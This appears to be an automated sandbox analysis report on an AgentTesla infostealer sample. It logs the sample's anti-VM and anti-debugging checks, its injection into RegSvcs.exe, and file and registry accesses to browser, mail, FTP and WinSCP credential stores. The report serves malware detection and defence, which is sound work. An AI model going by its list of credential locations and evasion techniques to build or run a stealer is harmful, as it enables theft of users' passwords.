Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597467	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.2603734744.00000000023F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: RegSvcs.exe, 00000007.00000002.2603734744.00000000023F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: phagocytose.exe, 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, phagocytose.exe, 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: hgfsZrw6
Source: phagocytose.exe, 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: RegSvcs.exe, 00000007.00000002.2607013416.0000000005902000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: RegSvcs.exe, 00000003.00000002.1587932635.0000000005D81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	API call chain: ExitProcess graph end node	graph_0-101978
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	API call chain: ExitProcess graph end node	graph_0-101549
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	API call chain: ExitProcess graph end node	graph_0-104187
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_02857070 CheckRemoteDebuggerPresent,

3_2_02857070

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007B3F09 BlockInput,

0_2_007B3F09

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00743B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00743B3A

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00775A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

0_2_00775A7C

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_008559E0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_008559E0

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_012FD330 mov eax, dword ptr fs:[00000030h]	0_2_012FD330
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_012FE970 mov eax, dword ptr fs:[00000030h]	0_2_012FE970
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_012FE9D0 mov eax, dword ptr fs:[00000030h]	0_2_012FE9D0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_0120B018 mov eax, dword ptr fs:[00000030h]	2_2_0120B018
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_01209978 mov eax, dword ptr fs:[00000030h]	2_2_01209978
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_0120AFB8 mov eax, dword ptr fs:[00000030h]	2_2_0120AFB8
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_01908730 mov eax, dword ptr fs:[00000030h]	6_2_01908730
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_01909DD0 mov eax, dword ptr fs:[00000030h]	6_2_01909DD0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_01909D70 mov eax, dword ptr fs:[00000030h]	6_2_01909D70

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007980A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,

0_2_007980A9

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0076A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0076A155
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0076A124 SetUnhandledExceptionFilter,	0_2_0076A124
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E4A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00E4A155
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E4A124 SetUnhandledExceptionFilter,	2_2_00E4A124
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E4A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00E4A155
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E4A124 SetUnhandledExceptionFilter,	6_2_00E4A124

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8E3008			Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 27D008			Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007987B1 LogonUserW,

0_2_007987B1

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00743B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00743B3A

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_007448D7

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007A4C7F mouse_event,

0_2_007A4C7F

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\28uMwHvbTD.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\roundup\phagocytose.exe "C:\Users\user\AppData\Local\roundup\phagocytose.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\roundup\phagocytose.exe"	Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00797CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00797CAF

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_0079874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0079874B

Source: 28uMwHvbTD.exe, 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmp, phagocytose.exe, 00000002.00000002.1425882526.0000000000ED4000.00000040.00000001.01000000.00000004.sdmp, phagocytose.exe, 00000006.00000002.1583164213.0000000000ED4000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: phagocytose.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_0076862B cpuid

0_2_0076862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00774E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00774E87

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00781E06 GetUserNameW,

0_2_00781E06

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00773F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00773F3A

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007449A0

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.phagocytose.exe.10a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.phagocytose.exe.40c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2603734744.0000000002406000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 4072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 1212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3376, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: phagocytose.exe	Binary or memory string: WIN_81
Source: phagocytose.exe	Binary or memory string: WIN_XP
Source: phagocytose.exe	Binary or memory string: WIN_XPe
Source: phagocytose.exe	Binary or memory string: WIN_VISTA
Source: phagocytose.exe	Binary or memory string: WIN_7
Source: phagocytose.exe	Binary or memory string: WIN_8
Source: phagocytose.exe, 00000006.00000002.1583164213.0000000000ED4000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.phagocytose.exe.10a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.phagocytose.exe.40c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 4072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 1212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3376, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.phagocytose.exe.10a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.phagocytose.exe.40c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2603734744.0000000002406000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 4072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: phagocytose.exe PID: 1212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3376, type: MEMORYSTR

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_007B6283
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_007B6747
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E96283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00E96283
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E96747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00E96747
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E96283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	6_2_00E96283
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E96747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	6_2_00E96747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
